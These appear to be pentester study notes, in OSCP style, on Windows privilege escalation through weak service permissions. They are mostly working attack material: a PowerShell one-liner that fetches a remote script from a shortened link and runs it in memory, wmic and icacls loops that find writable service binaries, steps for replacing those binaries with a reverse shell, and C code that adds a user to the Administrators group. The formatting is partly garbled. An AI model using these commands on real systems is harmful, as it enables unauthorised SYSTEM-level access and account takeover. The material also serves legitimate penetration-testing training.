Great Resources:
[](https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html](https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html))
Windows Privilege Escalation Methods for Pentesters
dostoevskylabs/dostoevsky-pentest-notes
download and run priv esc script without disk access
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('[<http://bit.ly/1kEgbuH>](<http://bit.ly/1kEgbuH>)')"
NOTE: Hi-priv shell sessions that are created through weak services will die quickly, like in 20-30 sec, make sure to migrate (Meterpreter) to a new process, or start a create a new process by opening another shell with nc.exe
wmic and icaclsUse icacls [.exe] to check for insecure permissions such as Everyone:(I)(F) within service executables (within services.msc), and then with a non-privileged user, replace that file with a malicious file.
Automatically find weak service file permissions with the following:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> services.txt
for /f eol^=^"^ delims^=^" %a in (services.txt) do cmd.exe /c icacls "%a" >> permissions.txt
# look for `Everyone:(...)(F)`, `BUILTIN\\Users:(...)(F)`, `NT AUTHORITY\\Authenticated Users:(...)(M)`, `NT AUTHORITY\\Authenticated Users:(...)(C)`, `[Computer]\\[Your User]:(...)(F)` in permissions.txt. transfer it out to kali if needed, as it it'll be easier to search
Upload a reverse shell executable and replace the original service executable with the malicious one with copy useradd.exe C:\\the\\path\\to\\service\\binary.exe. The next time the service is started, the malicious executable will run with SYSTEM privileges.
Tools:
icaclsAlternatively, make the current low-priv user an Administrator. Prepare a malicious executable to give bob administrative rights on Kali:
#include <stdlib.h>int main() { int i; i = system("net localgroup administrators bob /add"); return i;
}